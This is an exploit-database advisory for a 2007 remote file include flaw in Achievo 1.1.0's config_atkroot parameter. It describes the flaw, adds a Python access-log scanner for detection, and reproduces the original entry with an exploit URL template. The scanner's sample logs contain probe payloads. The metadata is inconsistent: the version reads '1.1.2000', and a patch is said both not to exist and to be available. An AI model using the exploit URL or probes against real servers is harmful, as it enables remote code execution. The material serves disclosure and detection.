Vendor: Achievo
By: Katatafish (karatatata@hush.com)
CVSS: 7.5 (HIGH)
CWE: Remote File Include
Product Name: Achievo
Affected Version From: 1.1.2000
Affected Version To: 1.1.2000
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Achievo 1.1.0 (index.php) Remote File Include Vulnerability

Achievo 1.1.0 is vulnerable to Remote File Include through index.php: the config_atkroot request parameter ends up in the path that atk.inc passes to include_once. An attacker can use it to include arbitrary remote files, resulting in remote code execution.

Mitigation:

The vulnerability can be mitigated by applying the latest patch or upgrading to a newer version of Achievo.
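
While an affected installation is still deployed, web server access logs can be checked for requests that try to set config_atkroot. The following is an added example, not part of the original advisory: it assumes combined-format access logs and that no legitimate client ever sends this parameter, and the log lines and the host.invalid name are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

PARAM = "config_atkroot"  # parameter name taken from the advisory
# Request line of a combined-log-format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Value starts with a URL scheme, "//" or a UNC prefix, i.e. is not a local relative path.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]+:|//|\\\\)', re.I)

# Constructed sample log lines (documentation IP ranges, .invalid host).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/May/2007:10:01:02 +0000] "GET /achievo/index.php HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.7 - - [15/May/2007:10:03:44 +0000] "GET /achievo/index.php?config_atkroot=http%3A%2F%2Fhost.invalid%2Ff.txt%3F HTTP/1.1" 200 312 "-" "-"',
    '198.51.100.7 - - [15/May/2007:10:03:50 +0000] "GET /achievo/index.php?config_atkroot=../../tmp/ HTTP/1.0" 200 88 "-" "-"',
    '203.0.113.5 - - [15/May/2007:10:04:01 +0000] "GET /achievo/index.php?x=1&config%5Fatkroot=%2568ttp%253A%252F%252Fhost.invalid%252Fa HTTP/1.1" 200 90 "-" "-"',
]


def classify(line):
    """Return None, 'override' or 'remote' for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    verdict = None
    # parse_qsl percent-decodes keys and values, so config%5Fatkroot is caught too.
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key != PARAM:
            continue
        verdict = verdict or "override"
        # Decode once more so double-encoded probes are classified as well.
        if REMOTE_RE.match(value) or REMOTE_RE.match(unquote(value)):
            verdict = "remote"
    return verdict


def scan(lines):
    """Yield (line_number, verdict, client_address) for each suspicious line."""
    for number, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            yield number, verdict, line.split(" ", 1)[0]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Only the query string is visible in an access log, so the same parameter sent in a POST body or cookie would need request-body logging or a WAF rule to be seen.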

Exploit-DB raw data:

## Achievo 1.1.0(index.php) Remote File Include Vulnerability ##

#Found by : Katatafish (karatatata@hush.com)

#Download http://www.achievo.org/files/achievo-stable-1.1.0.tar.gz

# File: ./atk.inc
 include_once($config_atkroot."atk/modules/class.atkmodule.inc");

# Exploit http://site.com/[path]/index.php?config_atkroot=SHELL

# milw0rm.com [2007-05-15]